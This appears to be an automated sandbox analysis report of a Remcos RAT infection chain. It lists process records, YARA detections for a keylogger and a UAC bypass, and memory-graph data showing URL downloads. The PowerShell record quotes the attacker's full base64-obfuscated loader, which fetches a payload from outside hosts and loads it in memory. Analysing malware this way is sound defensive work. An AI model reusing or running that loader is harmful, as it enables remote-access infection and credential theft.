                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:4
                                                                                                                Start time:01:12:01
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline"
                                                                                                                Imagebase:0x890000
                                                                                                                File size:2'141'552 bytes
                                                                                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:5
                                                                                                                Start time:01:12:01
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38A1.tmp" "c:\Users\user\AppData\Local\Temp\r1df4acf\CSC5F9E68122E144DC389875BBF6681BEA.TMP"
                                                                                                                Imagebase:0x420000
                                                                                                                File size:46'832 bytes
                                                                                                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:6
                                                                                                                Start time:01:12:07
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"
                                                                                                                Imagebase:0xa90000
                                                                                                                File size:147'456 bytes
                                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:01:12:07
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
                                                                                                                Imagebase:0xcb0000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:8
                                                                                                                Start time:01:12:07
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:12
                                                                                                                Start time:01:12:32
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                Imagebase:0x9c0000
                                                                                                                File size:108'664 bytes
                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:false

                                                                                                                Target ID:13
                                                                                                                Start time:01:12:38
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\foowuyqkwn"
                                                                                                                Imagebase:0xf50000
                                                                                                                File size:108'664 bytes
                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:14
                                                                                                                Start time:01:12:38
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qiupnqamsvkxb"
                                                                                                                Imagebase:0x540000
                                                                                                                File size:108'664 bytes
                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:15
                                                                                                                Start time:01:12:38
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\skzzoilfgdcclexm"
                                                                                                                Imagebase:0xf60000
                                                                                                                File size:108'664 bytes
                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Reset < >
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1690065241.0000000007250000.00000010.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_7250000_mshta.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a68e4b8157c3a9a276147b30d5b043f5d5869b0b793f5480ee33d2531b1fe031
                                                                                                                  • Instruction ID: 2193541a08c8c5af366bdbc12619c0f45209326dd38e0515b2c9c1b3751920de
                                                                                                                  • Opcode Fuzzy Hash: a68e4b8157c3a9a276147b30d5b043f5d5869b0b793f5480ee33d2531b1fe031
                                                                                                                  • Instruction Fuzzy Hash: 5F01FFB5A602069FDB50CEAC8C82BEEB7F9AB89710F190419A614F7681D7B4D9418B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1690088700.0000000006EB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_6eb0000_mshta.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                  • Instruction ID: 906af193c3a70ca30bb1eb3e2413404f0fdf0cf406cdd825e2a21439b9ade37f
                                                                                                                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1690088700.0000000006EB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_6eb0000_mshta.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                  • Instruction ID: 906af193c3a70ca30bb1eb3e2413404f0fdf0cf406cdd825e2a21439b9ade37f
                                                                                                                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1690088700.0000000006EB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_6eb0000_mshta.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                  • Instruction ID: 906af193c3a70ca30bb1eb3e2413404f0fdf0cf406cdd825e2a21439b9ade37f
                                                                                                                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1690088700.0000000006EB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_6eb0000_mshta.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                  • Instruction ID: 906af193c3a70ca30bb1eb3e2413404f0fdf0cf406cdd825e2a21439b9ade37f
                                                                                                                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                  • Instruction Fuzzy Hash:

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:3.8%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:17%
                                                                                                                  Total number of Nodes:47
                                                                                                                  Total number of Limit Nodes:6
                                                                                                                  execution_graph 9124 46b7480 9125 46b74be 9124->9125 9126 46b764b 9125->9126 9132 46b7da8 9125->9132 9136 46b7c45 9125->9136 9144 46b7a18 9125->9144 9153 46b7a08 9125->9153 9127 46b75df 9133 46b7cf9 9132->9133 9133->9132 9162 70745f4 9133->9162 9170 7074610 9133->9170 9139 46b7b9a 9136->9139 9141 46b7c5e 9136->9141 9137 46b7de8 URLDownloadToFileW 9140 46b7ea8 9137->9140 9139->9136 9139->9137 9140->9127 9142 70745f4 3 API calls 9141->9142 9143 7074610 3 API calls 9141->9143 9142->9141 9143->9141 9145 46b7a4c 9144->9145 9146 46b7de8 URLDownloadToFileW 9145->9146 9147 46b7b30 9145->9147 9150 46b7c5e 9145->9150 9149 46b7ea8 9146->9149 9147->9127 9149->9127 9151 70745f4 3 API calls 9150->9151 9152 7074610 3 API calls 9150->9152 9151->9150 9152->9150 9158 46b7a4c 9153->9158 9154 46b7de8 URLDownloadToFileW 9157 46b7ea8 9154->9157 9155 46b7b30 9155->9127 9157->9127 9158->9154 9158->9155 9159 46b7c5e 9158->9159 9160 70745f4 3 API calls 9159->9160 9161 7074610 3 API calls 9159->9161 9160->9159 9161->9159 9164 707460b 9162->9164 9163 7074a93 9163->9133 9164->9163 9166 46b7a08 4 API calls 9164->9166 9167 46b7a18 4 API calls 9164->9167 9169 46b7c45 4 API calls 9164->9169 9178 46b1bf8 9164->9178 9165 7074a34 9165->9133 9166->9165 9167->9165 9169->9165 9171 7074a93 9170->9171 9172 7074641 9170->9172 9171->9133 9172->9171 9174 46b7a08 4 API calls 9172->9174 9175 46b7a18 4 API calls 9172->9175 9176 46b1bf8 URLDownloadToFileW 9172->9176 9177 46b7c45 4 API calls 9172->9177 9173 7074a34 9173->9133 9174->9173 9175->9173 9176->9173 9177->9173 9179 46b7e00 URLDownloadToFileW 9178->9179 9181 46b7ea8 9179->9181 9181->9165

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 167 46b7a18-46b7a4a 168 46b7a4c-46b7a53 167->168 169 46b7a90 167->169 170 46b7a55-46b7a62 168->170 171 46b7a64 168->171 172 46b7a93-46b7acf 169->172 173 46b7a66-46b7a68 170->173 171->173 181 46b7b58-46b7b63 172->181 182 46b7ad5-46b7ade 172->182 175 46b7a6a-46b7a6d 173->175 176 46b7a6f-46b7a71 173->176 180 46b7a8e 175->180 178 46b7a73-46b7a80 176->178 179 46b7a82 176->179 183 46b7a84-46b7a86 178->183 179->183 180->172 184 46b7b72-46b7b94 181->184 185 46b7b65-46b7b68 181->185 182->181 186 46b7ae0-46b7ae6 182->186 183->180 193 46b7b9a-46b7ba3 184->193 194 46b7c5e-46b7cf6 184->194 185->184 188 46b7de8-46b7e52 186->188 189 46b7aec-46b7af9 186->189 205 46b7e5d-46b7e63 188->205 206 46b7e54-46b7e5a 188->206 190 46b7afb-46b7b2e 189->190 191 46b7b4f-46b7b56 189->191 203 46b7b4b 190->203 204 46b7b30-46b7b33 190->204 191->181 191->186 193->188 198 46b7ba9-46b7be7 193->198 232 46b7cf9-46b7d52 194->232 215 46b7be9-46b7bff 198->215 216 46b7c01-46b7c14 198->216 203->191 208 46b7b3f-46b7b48 204->208 209 46b7b35-46b7b38 204->209 210 46b7e71-46b7ea6 URLDownloadToFileW 205->210 211 46b7e65-46b7e6e 205->211 206->205 209->208 213 46b7ea8-46b7eae 210->213 214 46b7eaf-46b7ec3 210->214 211->210 213->214 218 46b7c16-46b7c1d 215->218 216->218 219 46b7c1f-46b7c30 218->219 220 46b7c42-46b7c58 218->220 219->220 226 46b7c32-46b7c3b 219->226 220->193 220->194 226->220 245 46b7d55 call 70745f4 232->245 246 46b7d55 call 7074610 232->246 237 46b7d57-46b7d60 238 46b7d7a-46b7d8d 237->238 239 46b7d62-46b7d78 237->239 240 46b7d8f-46b7d96 238->240 239->240 241 46b7d98-46b7d9e 240->241 242 46b7da5-46b7daf 240->242 241->242 242->232 245->237 246->237
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1793231489.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 17ebb35e1450accd8cf404e0065e4cd4b936716ddc3d88ba642df960c9fd9032
                                                                                                                  • Instruction ID: db3452710bda14d2d328e112b8214dd92297c46f15711347312e1d22909fa7e0
                                                                                                                  • Opcode Fuzzy Hash: 17ebb35e1450accd8cf404e0065e4cd4b936716ddc3d88ba642df960c9fd9032
                                                                                                                  • Instruction Fuzzy Hash: EAE1F475A01219AFDB05CF98D984ADEBBF2FF88311F248159E848AB351D735A981CB90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 7074610-707463b 1 7074af2-7074b10 0->1 2 7074641-7074646 0->2 10 7074b12 1->10 11 7074b1e-7074b25 1->11 3 707465e-7074663 2->3 4 7074648-707464e 2->4 8 7074665-7074671 3->8 9 7074673 3->9 5 7074652-707465c 4->5 6 7074650 4->6 5->3 6->3 12 7074675-7074677 8->12 9->12 10->11 14 7074b27-7074b33 11->14 15 7074b35 11->15 16 7074a93-7074a9d 12->16 17 707467d-7074687 12->17 18 7074b37-7074b39 14->18 15->18 20 7074a9f-7074aa8 16->20 21 7074aab-7074ab1 16->21 17->1 19 707468d-7074692 17->19 26 7074b7b-7074b85 18->26 27 7074b3b-7074b42 18->27 24 7074694-707469a 19->24 25 70746aa-70746b8 19->25 22 7074ab7-7074ac3 21->22 23 7074ab3-7074ab5 21->23 28 7074ac5-7074aef 22->28 23->28 29 707469e-70746a8 24->29 30 707469c 24->30 25->16 41 70746be-70746dd 25->41 32 7074b87-7074b8b 26->32 33 7074b8e-7074b94 26->33 27->26 31 7074b44-7074b61 27->31 29->25 30->25 43 7074b63-7074b75 31->43 44 7074bc9-7074bce 31->44 36 7074b96-7074b98 33->36 37 7074b9a-7074ba6 33->37 42 7074ba8-7074bc6 36->42 37->42 41->16 52 70746e3-70746ed 41->52 43->26 44->43 52->1 53 70746f3-70746f8 52->53 54 7074710-7074714 53->54 55 70746fa-7074700 53->55 54->16 58 707471a-707471e 54->58 56 7074704-707470e 55->56 57 7074702 55->57 56->54 57->54 58->16 59 7074724-7074728 58->59 59->16 61 707472e-707473e 59->61 62 70747c6-7074815 61->62 63 7074744-707476b 61->63 80 707481c-707482f 62->80 68 7074785-70747b3 63->68 69 707476d-7074773 63->69 78 70747b5-70747b7 68->78 79 70747c1-70747c4 68->79 71 7074777-7074783 69->71 72 7074775 69->72 71->68 72->68 78->79 79->80 81 70748b7-7074906 80->81 82 7074835-707485c 80->82 99 707490d-7074920 81->99 87 7074876-70748a4 82->87 88 707485e-7074864 82->88 97 70748a6-70748a8 87->97 98 70748b2-70748b5 87->98 90 7074866 88->90 91 7074868-7074874 88->91 90->87 91->87 97->98 98->99 100 7074926-707494d 99->100 101 70749a8-70749f7 99->101 106 7074967-7074995 100->106 107 707494f-7074955 100->107 118 70749fe-7074a2c 101->118 116 7074997-7074999 106->116 117 70749a3-70749a6 106->117 108 7074957 107->108 109 7074959-7074965 107->109 108->106 109->106 116->117 117->118 123 7074a2f call 46b7a08 118->123 124 7074a2f call 46b7a18 118->124 125 7074a2f call 46b1bf8 118->125 126 7074a2f call 46b7c45 118->126 121 7074a34-7074a90 123->121 124->121 125->121 126->121
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tP^q$tP^q
                                                                                                                  • API String ID: 0-309238000
                                                                                                                  • Opcode ID: 8d603974bb9ccd3d8a599edb81105b57461f6595b84d05e5b441db5806a7a98a
                                                                                                                  • Instruction ID: adaab9c00321c0cb740475a52c7a86d521af9eac4b2f31d253714e5819e55d95
                                                                                                                  • Opcode Fuzzy Hash: 8d603974bb9ccd3d8a599edb81105b57461f6595b84d05e5b441db5806a7a98a
                                                                                                                  • Instruction Fuzzy Hash: EFE1E0B1F00245ABCB159F68C400B6EBBE6ABC9710F24C669F9059F390DE32EC45CB95

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 127 70704f8-707050a 128 7070510-7070521 127->128 129 70705ca-70705e8 127->129 132 7070523-7070529 128->132 133 707053b-7070558 128->133 134 7070612-707063e 129->134 135 70705ea-70705fd 129->135 136 707052d-7070539 132->136 137 707052b 132->137 133->129 145 707055a-707057c 133->145 151 7070640-707064e 134->151 152 70706bb-70706c0 134->152 138 70705ff-707060b 135->138 139 707066b-7070675 135->139 136->133 137->133 138->134 142 7070677-707067d 139->142 143 7070680-7070686 139->143 146 707068c-7070698 143->146 147 7070688-707068a 143->147 155 7070596-70705ae 145->155 156 707057e-7070584 145->156 149 707069a-70706b8 146->149 147->149 166 7070656-7070665 151->166 152->151 163 70705b0-70705b2 155->163 164 70705bc-70705c7 155->164 159 7070586 156->159 160 7070588-7070594 156->160 159->155 160->155 163->164 166->139
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1798105353.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7070000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tP^q$tP^q
                                                                                                                  • API String ID: 0-309238000
                                                                                                                  • Opcode ID: 95417034dc749fe31e8ab16933ae556ad7070a1248fd6591226e9411fafc030e
                                                                                                                  • Instruction ID: 812043e7a534adb2fe80ebf4fd3c88c648364dcac052f5174bf079d6677a214a
                                                                                                                  • Opcode Fuzzy Hash: 95417034dc749fe31e8ab16933ae556ad7070a1248fd6591226e9411fafc030e
                                                                                                                  • Instruction Fuzzy Hash: 175146B1F00314ABC7209B68C811B2BBFE6AFC5710F54C65AE949DF281CA31EC45C7A5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 247 46b1bf8-46b7e52 250 46b7e5d-46b7e63 247->250 251 46b7e54-46b7e5a 247->251 252 46b7e71-46b7ea6 URLDownloadToFileW 250->252 253 46b7e65-46b7e6e 250->253 251->250 254 46b7ea8-46b7eae 252->254 255 46b7eaf-46b7ec3 252->255 253->252 254->255
                                                                                                                  APIs
                                                                                                                  • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 046B7E99
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1793231489.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DownloadFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1407266417-0
                                                                                                                  • Opcode ID: 632b5d78d12003854a772fac3b8dab27112433d2666b77c673a4c866fb9278a0
                                                                                                                  • Instruction ID: 052781411d0639fb006edb7973cdd68415d6b1a8e44841b67af09ffbbefabd83
                                                                                                                  • Opcode Fuzzy Hash: 632b5d78d12003854a772fac3b8dab27112433d2666b77c673a4c866fb9278a0
                                                                                                                  • Instruction Fuzzy Hash: 3921F3B1D01219AFCB00CF99D884ADEFBF4FF88310F10812AE918A7250D375AA55CBA0

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
